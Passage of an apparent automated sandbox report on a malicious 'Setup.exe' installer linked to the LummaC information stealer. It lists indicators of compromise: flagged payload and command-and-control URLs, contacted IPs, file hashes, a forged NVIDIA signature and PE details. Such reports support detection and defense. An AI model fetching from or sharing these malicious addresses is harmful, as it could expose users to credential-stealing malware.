                                		high
                                tirepublicerj.shopfalse
                                  		high
                                  abruptyopsn.shopfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://displayclubby.sbs:443/apiSetup.exe, 00000000.00000003.2185440427.0000000003612000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2185774111.0000000003612000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://displayclubby.sbs/)Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cegu.shop/Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://dfgh.online/invoker.php?compName=Setup.exe, 00000000.00000002.4466727451.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852575069.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4468769153.0000000003718000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://displayclubby.sbs/Setup.exe, Setup.exe, 00000000.00000002.4467465356.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4466727451.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852643199.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2173869381.0000000003687000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2174049537.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852643199.000000000078F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467465356.0000000000790000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.starfieldtech.com/0DSetup.exefalse
                                                		high
                                                http://crl.thawte.com/ThawteTimestampingCA.crl0Setup.exefalse
                                                  		high
                                                  http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://klipvumisui.shop/int_clp_sha.txtpSetup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.starfieldtech.com/repository/sfsroot.crl0PSetup.exefalse
                                                          		high
                                                          https://klipvumisui.shop/int_clp_sha.txtdsSetup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://klipvumisui.shop/int_clp_sha.txtSetup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.innosetup.com/Setup.exefalse
                                                                		high
                                                                https://displayclubby.sbs/apiJgSetup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://displayclubby.sbs/qSetup.exe, 00000000.00000003.2231452822.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://displayclubby.sbs/&&8Setup.exe, 00000000.00000003.2202431157.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://ocsp.thawte.com0Setup.exefalse
                                                                    		high
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cegu.shop/8574262446/ph.txt1eNISetup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://certificates.starfieldtech.com/repository/1604Setup.exefalse
                                                                            		high
                                                                            https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.symauth.com/cps0(Setup.exefalse
                                                                                		high
                                                                                https://cegu.shop/QSetup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cegu.shop/8574262446/ph.txtebKit/537.36Setup.exe, 00000000.00000002.4468527188.0000000002ABB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://displayclubby.sbs/api;Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.000000000077F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://crl.starfieldtech.com/repository/0Setup.exefalse
                                                                                      		high
                                                                                      http://www.symauth.com/rpa00Setup.exefalse
                                                                                        		high
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cegu.shop/8574262446/ph.txtMhNfSetup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://www.remobjects.com/psSetup.exefalse
                                                                                            		high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://displayclubby.sbs/api$Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://cegu.shop/8574262446/ph.txtlSetup.exe, 00000000.00000003.2252229474.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              185.161.251.21
                                                                                              		cegu.shopUnited Kingdom
                                                                                              		5089NTLGBfalse
                                                                                              104.21.64.1
                                                                                              		displayclubby.sbsUnited States
                                                                                              		13335CLOUDFLARENETUStrue

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1584525
                                                                                              Start date and time:2025-01-05 18:57:11 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 7m 37s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:4
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:Setup.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 0
                                                                                              • Number of non-executed functions: 8
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target Setup.exe, PID 6576 because there are no executed function
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              12:58:14API Interceptor8x Sleep call for process: Setup.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              185.161.251.21Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              104.21.64.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                              • adsfirm.com/administrator/index.php
                                                                                                              PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.bser101pp.buzz/v89f/

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              cegu.shopSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              NTLGBSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.161.251.21
                                                                                                              momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 82.18.222.135
                                                                                                              momo.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 82.17.192.171
                                                                                                              CLOUDFLARENETUSSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.208.58
                                                                                                              Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.178.174
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.163.221
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 188.114.96.3
                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.32.1
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.21.63
                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 188.114.96.3
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.208.58
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.90.109

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              No created / dropped files found

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):0.512131792943311
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                              • Windows ActiveX control (116523/4) 1.14%
                                                                                                              • Inno Setup installer (109748/4) 1.07%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              File name:Setup.exe
                                                                                                              File size:75'077'735 bytes
                                                                                                              MD5:2fbed9c7f4e671459ba52391d1d2975d
                                                                                                              SHA1:89e3ebc3fb946566a77bb1359d0f43eded9ff3a2
                                                                                                              SHA256:0f17388ac1220dcb7bcb2889e16bb21fae876045a55079a572057c75fa2d2067
                                                                                                              SHA512:ddbc924f47f8ae7d6c27026c293b94cd1640f32a82c8cc9561693e6f5cee490c695f29db307c2d1b68d72651e40f8bbfe6e4149009a8fe387bcfd6d4edf29bf1
                                                                                                              SSDEEP:24576:bnbbPIm7K4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtdqxytD7TriBH0T0OgxLDQX:THBKh4nqzF3PYdStoari+gJQ
                                                                                                              TLSH:13F7D2ABF2D00BA5B75236ED4D0E9FCD99146110A31014FF6F9A050A6EFB5D84332A7E
                                                                                                              File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                              File Icon

                                                                                                              Icon Hash:2d2e3797b32b2b99

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x5025d8
                                                                                                              Entrypoint Section:.itext
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f62b90e31eca404f228fcf7068b00f31

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                              Error Number:-2146869232
                                                                                                              Not Before, Not After
                                                                                                              • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                              Subject Chain
                                                                                                              • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                              Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                              Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                              Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFF0h
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov eax, 00500930h
                                                                                                              call 00007FDE0D186846h
                                                                                                              push FFFFFFECh
                                                                                                              mov eax, dword ptr [00505E5Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov ebx, dword ptr [eax+00000170h]
                                                                                                              push ebx
                                                                                                              call 00007FDE0D1876F1h
                                                                                                              and eax, FFFFFF7Fh
                                                                                                              push eax
                                                                                                              push FFFFFFECh
                                                                                                              mov eax, dword ptr [00505E5Ch]
                                                                                                              push ebx
                                                                                                              call 00007FDE0D187946h
                                                                                                              xor eax, eax
                                                                                                              push ebp
                                                                                                              push 00502653h
                                                                                                              push dword ptr fs:[eax]
                                                                                                              mov dword ptr fs:[eax], esp
                                                                                                              push 00000001h
                                                                                                              call 00007FDE0D187091h
                                                                                                              call 00007FDE0D27DF2Ch
                                                                                                              mov eax, dword ptr [00500568h]
                                                                                                              push eax
                                                                                                              push 005005CCh
                                                                                                              mov eax, dword ptr [00505E5Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007FDE0D1F9D1Dh
                                                                                                              call 00007FDE0D27DF80h
                                                                                                              xor eax, eax
                                                                                                              pop edx
                                                                                                              pop ecx
                                                                                                              pop ecx
                                                                                                              mov dword ptr fs:[eax], edx
                                                                                                              jmp 00007FDE0D27FEFBh
                                                                                                              jmp 00007FDE0D181F6Dh
                                                                                                              call 00007FDE0D27DCFCh
                                                                                                              mov eax, 00000001h
                                                                                                              call 00007FDE0D182A2Eh
                                                                                                              call 00007FDE0D1823B1h
                                                                                                              mov eax, dword ptr [00505E5Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, 005027E8h
                                                                                                              call 00007FDE0D1F9828h
                                                                                                              push 00000005h
                                                                                                              mov eax, dword ptr [00505E5Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov eax, dword ptr [eax+00000170h]
                                                                                                              push eax
                                                                                                              call 00007FDE0D187907h
                                                                                                              mov eax, dword ptr [00505E5Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, dword ptr [004DACA0h]

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x10e0000x3840.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1140000x6fe00.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x4795ea70x39c0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x1130000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10ea800x88c.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000xffdc80xffe0075eab3cd689bdfd0b7c52f77c4597fdfFalse0.483021075048852data6.485099366431733IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .itext0x1010000x17f40x18008e0d52126a75001416d71c23878be2c1False0.5244140625data6.003729381717893IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .data0x1030000x308c0x3200c2acc8e96fc244753abd1d87bb624bc0False0.425078125data4.3575606000501415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .bss0x1070000x61980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata0x10e0000x38400x3a000e1e8128f777a5ff18a144305a4fb39cFalse0.3108836206896552data5.2048781278956655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .tls0x1120000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rdata0x1130000x180x2009cf98ea6bb17a35d99fa770a2e9a8ff0False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x1140000x6fe000x6fe0009c3297f581f32b4217214693c9232b0False0.5837792423184358data7.2672713896631524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_CURSOR0x114c440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                              RT_CURSOR0x114d780x134dataEnglishUnited States0.4642857142857143
                                                                                                              RT_CURSOR0x114eac0x134dataEnglishUnited States0.4805194805194805
                                                                                                              RT_CURSOR0x114fe00x134dataEnglishUnited States0.38311688311688313
                                                                                                              RT_CURSOR0x1151140x134dataEnglishUnited States0.36038961038961037
                                                                                                              RT_CURSOR0x1152480x134dataEnglishUnited States0.4090909090909091
                                                                                                              RT_CURSOR0x11537c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                              RT_BITMAP0x1154b00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
